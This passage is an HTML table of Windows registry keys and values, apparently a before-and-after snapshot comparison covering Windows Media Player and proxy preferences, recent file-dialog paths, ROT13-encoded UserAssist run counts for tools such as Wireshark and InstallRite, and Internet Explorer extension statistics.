<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentSettingsView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"EQView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentMetadataView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"MediaInfoView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentDisplayPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentSettingsPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentMetadataPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserDisplayView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"VizView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPDisplayView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"VizView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPSettingsView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"EQView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPMetadataView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"MediaInfoView"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserDisplayPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPDisplayPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPSettingsPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPMetadataPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPShowSettings</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UserWMPShowMetadata</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShowAlbumArt</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">RandomFolderName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"0009236B"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">LastPlaylist</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,43,00,3a,00,5c,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,20,00,61,00,6e,00,64,00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,73,00,5c,00,62,00,6f,00,6d,00,62,00,65,00,72,00,5c,00,41,00,70,00,70,00,6c,00,69,00,63,00,61,00,74,00,69,00,6f,00,6e,00,20,00,44,00,61,00,74,00,61,00,5c,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,5c,00,4d,00,65,00,64,00,69,00,61,00,20,00,50,00,6c,00,61,00,79,00,65,00,72,00,5c,00,30,00,30,00,30,00,39,00,32,00,33,00,36,00,42,00,2e,00,77,00,70,00,6c,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">LastPlaylistQuery</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">LastPlaylistIndex</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\EqualizerSettings</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyStyle</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyPort</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000050</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyBypass</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyExclude</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyStyle</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyPort</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:000006db</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyBypass</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyExclude</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyStyle</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyPort</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000022a</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyBypass</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP</span></td>
<td><span style="color: black; font-size: xx-small;">ProxyExclude</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Setup\UserOptions</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Setup\UserOptions</span></td>
<td><span style="color: black; font-size: xx-small;">DesktopShortcut</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"no"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Setup\UserOptions</span></td>
<td><span style="color: black; font-size: xx-small;">QuickLaunchShortcut</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Setup\CreatedLinks</span></td>
<td><span style="color: black; font-size: xx-small;">Shortcut4</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\Application Data\Microsoft\Internet Explorer\Quick Launch\Windows Media Player.lnk"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Multimedia\ActiveMovie</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Multimedia\ActiveMovie\Filter Cache</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU</span></td>
<td><span style="color: black; font-size: xx-small;">a</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:77,00,69,00,72,00,65,00,73,00,68,00,61,00,72,00,6b,00,2e,00,65,00,78,00,65,00,00,00,43,00,3a,00,5c,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,20,00,61,00,6e,00,64,00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,73,00,5c,00,62,00,6f,00,6d,00,62,00,65,00,72,00,5c,00,4d,00,79,00,20,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU</span></td>
<td><span style="color: black; font-size: xx-small;">MRUList</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"a"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU</span></td>
<td><span style="color: black; font-size: xx-small;">a</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\My Documents\pcap"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU</span></td>
<td><span style="color: black; font-size: xx-small;">MRUList</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"a"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*</span></td>
<td><span style="color: black; font-size: xx-small;">a</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\My Documents\pcap"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*</span></td>
<td><span style="color: black; font-size: xx-small;">MRUList</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"a"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage</span></td>
<td><span style="color: black; font-size: xx-small;">StartMenu_Balloon_Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:b0,27,b0,17,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:f0,f5,4b,1c,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACNGU</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,10,00,00,00,50,e8,07,19,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,14,00,00,00,90,71,d8,1e,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\pzq.rkr</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,d0,cf,da,d9,de,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,09,00,00,00,90,2d,68,fb,df,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACNGU:P:\Cebtenz Svyrf\Vagrearg Rkcybere\VRKCYBER.RKR</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,b0,e4,6a,a6,dd,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,09,00,00,00,d0,f4,ef,4e,df,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACVQY</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,0d,00,00,00,b0,f7,ed,18,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,11,00,00,00,00,91,ad,1e,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACVQY:%pfvqy2%\VafgnyyEvgr 2.5\VafgnyyEvgr.yax</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,b0,f7,ed,18,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,09,00,00,00,60,0a,ac,1e,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACVQY:%pfvqy2%\VafgnyyEvgr 2.5</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,b0,f7,ed,18,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,09,00,00,00,00,91,ad,1e,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACNGU:P:\Cebtenz Svyrf\Rcfvyba Fdhnerq\VafgnyyEvgr\VafgnyyEvgr.rkr</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,50,e8,07,19,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,09,00,00,00,90,71,d8,1e,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACVQY:::{2559N1S4-21Q7-11Q4-OQNS-00P04S60O9S0}</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,07,00,00,00,b0,e4,6a,a6,dd,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,70,7b,f1,4e,df,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACVQY:%pfvqy2%\Jverfunex.yax</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,02,00,00,00,00,00,00,00,00,00,00,00,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,06,00,00,00,a0,58,5d,5d,df,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACNGU:P:\Cebtenz Svyrf\Jverfunex\jverfunex.rkr</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,06,00,00,00,00,71,80,5d,df,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Type</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Flags</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,21,00,3a,00,fb,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Type</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Flags</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,94,02,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore</span></td>
<td></td>
